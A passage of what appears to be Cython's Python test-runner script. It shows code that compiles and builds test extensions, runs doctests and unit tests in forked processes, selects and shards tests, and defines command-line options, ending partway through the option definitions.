def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter()
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter()
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Main import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Main import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def shortDescription(self):
if self.cython_only:
return CythonCompileTestCase.shortDescription(self)
else:
return "compiling (%s%s) and running %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
# Py2.6 lacks "_TextTestResult.skipped"
failures, errors, skipped = len(result.failures), len(result.errors), len(getattr(result, 'skipped', []))
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
output = None
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
output = open(result_file, 'wb')
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
try:
if output is not None:
output.close()
except:
pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception("Tests in module '%s' were unexpectedly killed by signal %d"%
(module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
input = open(result_file, 'rb')
try:
PartialTestResult.join_results(result, pickle.load(input))
finally:
input.close()
if result_code:
raise Exception("Tests in module '%s' exited with status %d" %
(module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run((
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
))
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
try:
self.skipped
except AttributeError:
self.skipped = [] # Py2.6
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
try:
result.skipped.extend(skipped)
except AttributeError:
pass # Py2.6
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.name)
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "tox.ini")
if not os.path.exists(config_file):
config_file=os.path.join(os.path.dirname(__file__), "tox.ini")
paths = glob.glob(os.path.join(self.cython_dir, "**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
commands = (self.commands
.replace("CYTHON", "PYTHON %s" % os.path.join(self.cython_root, 'cython.py'))
.replace("PYTHON", sys.executable))
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + old_path
env['PYTHONPATH'] = new_path
cmd = []
out = []
err = []
for command_no, command in enumerate(filter(None, commands.splitlines()), 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if ' setup.py ' in command else 'etoe-run'):
p = subprocess.Popen(command,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
env=env)
_out, _err = p.communicate()
cmd.append(command)
out.append(_out)
err.append(_err)
res = p.returncode
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
self.assertEqual(0, os.system(
"make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
try:
os.remove('make.output')
except OSError:
pass
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = (testname in self.excludes
or testname.split('.')[-1] in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=sys.version_info[0] < 3):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(testname) & 0x7fffffff if _is_py2 else _hash(testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.currentThread()
blocking_threads = []
for t in threading.enumerate():
if not t.isAlive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.isAlive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
